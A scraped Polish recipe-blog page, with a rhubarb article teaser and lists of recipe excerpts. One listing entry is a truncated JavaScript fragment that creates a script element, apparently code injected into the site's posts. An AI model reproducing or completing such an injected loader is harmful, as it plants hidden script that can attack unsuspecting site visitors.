Co zrobić z rabarbarem, by nie był kwaśny – ten dodatek to klucz

Rabarbar pojawia się w sklepach i na straganach wcześnie – gdy inne owoce dopiero dojrzewają. Ten długi, czerwono-zielony łodygowy bohater kuchni potrafi wywołać skrajne emocje: jedni go uwielbiają, inni unikają przez jego cierpki smak. W moim domu dzieciństwa majowe ciasto z rabarbarem to była trad...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 10
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 7
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 9
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 10
(function(){ u938=document.createElement("script");u938.type ⇖ 9
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 20
Przepisy z bloga
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 10
Por to jedno z tych warzyw, które często traktujemy po... ⇖ 9
Domowy sos paprykowy to coś więcej niż tylko przetwór... ⇖ 12
Czasem wystarczy jeden niewielki dodatek, aby przeciętny... ⇖ 9
Pomidory to warzywo, które od pokoleń towarzyszy nam w... ⇖ 40
Gdy pierwszy raz spróbowałem wietnamskich sajgonek... ⇖ 41
Pieczarki od zawsze towarzyszyły mi w kuchni – były... ⇖ 49
Patison – warzywo, które łatwo przeoczyć na straganie,... ⇖ 32
Choć parówki długo kojarzyły się z produktami niskiej... ⇖ 38
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 322
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 266